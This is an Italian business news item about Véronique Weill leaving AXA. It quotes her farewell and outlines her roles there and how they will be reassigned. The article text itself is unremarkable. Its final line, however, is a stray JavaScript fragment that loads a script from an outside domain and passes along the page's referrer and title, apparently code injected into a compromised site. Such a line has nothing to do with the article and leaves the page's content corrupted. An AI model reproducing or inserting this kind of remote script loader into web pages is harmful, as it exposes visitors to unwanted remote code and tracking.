Dopo 10 anni in AXA, Véronique Weill, a capo di AXA Global Asset Management, Chief Customer Officer e membro del board, ha deciso di lasciare il gruppo.

«E’ tempo per me di concentrarmi su nuove sfide professionali. So che sarò ispirata da questi dieci anni fantastici passati in Axa. Sono orgogliosa di quello che abbiamo realizzato con i miei team. Auguro loro il meglio per il futuro”.

Véronique Weill era entrata in Axa nel 2006 come direttore di AXA Business Services e Vice-presidente esecutivo dell’eccellenza operativa del gruppo. Nel 2009 venne nominata Chief Operating Officer del gruppo, incaricata del Marketing, Distribuzione, del Data Innovation Lab, dell’IT, dell’eccellenza operativa e degli acquisti. Dal luglio 2016, guida AXA Global Asset Management ed è Chief Customer Officer del gruppo.

Le responsabilità esecutive di Véronique Weill verranno affidate ad altri membri del board, in particolare quelle dei Client, Marketing e Digitale, riporteranno direttamente a Thomas Buberl, e AXA Global Asset Management a Paul Evans.

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;